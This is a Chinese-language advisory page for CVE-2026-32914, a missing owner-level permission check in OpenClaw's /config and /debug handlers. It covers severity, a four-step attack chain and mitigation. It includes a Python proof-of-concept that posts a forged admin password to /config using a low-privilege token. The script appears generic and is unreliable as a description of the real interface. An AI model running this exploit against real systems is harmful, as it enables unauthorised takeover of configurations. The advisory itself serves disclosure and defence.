CVE-2026-32914 CVSS 8.8 高危

CVE-2026-32914 OpenClaw访问控制漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32914

漏洞类型

访问控制失效

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.12之前的版本在/config和/debug命令处理程序中存在访问控制不当漏洞。由于缺乏所有者级别的权限检查，已获得命令授权的非所有者用户可以访问仅限所有者的界面。攻击者可利用此漏洞读取或修改受限的特权配置设置，导致系统机密性、完整性和可用性受到严重影响。

技术细节

该漏洞源于OpenClaw在处理/config和/debug命令时，未正确实施所有者级别的权限验证机制。虽然系统要求用户具备命令授权，但并未进一步验证该用户是否为资源的所有者。因此，任何拥有基础命令权限的低权限用户，都可以通过构造特定的请求调用这些敏感接口。攻击者利用此逻辑缺陷，能够绕过安全边界，直接访问本应受严格保护的配置和调试界面。这不仅允许攻击者读取敏感的系统配置信息，还支持对其进行修改，从而完全控制受影响系统的行为，实现从低权限账户到高权限功能的横向提升。

攻击链分析

STEP 1

1. 信息收集与认证

攻击者识别目标运行的OpenClaw版本，并获取一个具有基础命令授权权限的低权限账户凭证。

STEP 2

2. 发送恶意请求

攻击者利用低权限账户，向/config或/debug接口发送特制的HTTP请求，试图访问或修改配置。

STEP 3

3. 权限绕过

由于服务端未验证请求者是否为资源所有者，请求被成功处理，绕过了访问控制限制。

STEP 4

4. 执行攻击操作

攻击者成功读取敏感配置信息或写入恶意配置，导致系统被完全控制或数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_openclaw(target_url, token):
    """
    PoC for CVE-2026-32914: Exploit insufficient access control in /config endpoint.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    # Attempt to modify owner-only configuration
    payload = {
        "debug_enabled": True,
        "admin_password": "hacked"
    }
    
    try:
        # The endpoint /config should be owner-only, but lacks checks
        response = requests.post(f"{target_url}/config", json=payload, headers=headers)
        
        if response.status_code == 200:
            print("[+] Exploit successful! Privileged configuration modified.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except Exception as e:
        print(f"Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://vulnerable-openclaw-instance.com"
    # Low privilege token (command authorized but not owner)
    auth_token = "LOW_PRIVILEGE_USER_TOKEN"
    exploit_openclaw(target, auth_token)

影响范围

OpenClaw < 2026.3.12

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用/config和/debug命令处理程序，或通过防火墙规则仅允许受信任的管理员IP地址访问相关端口，以降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表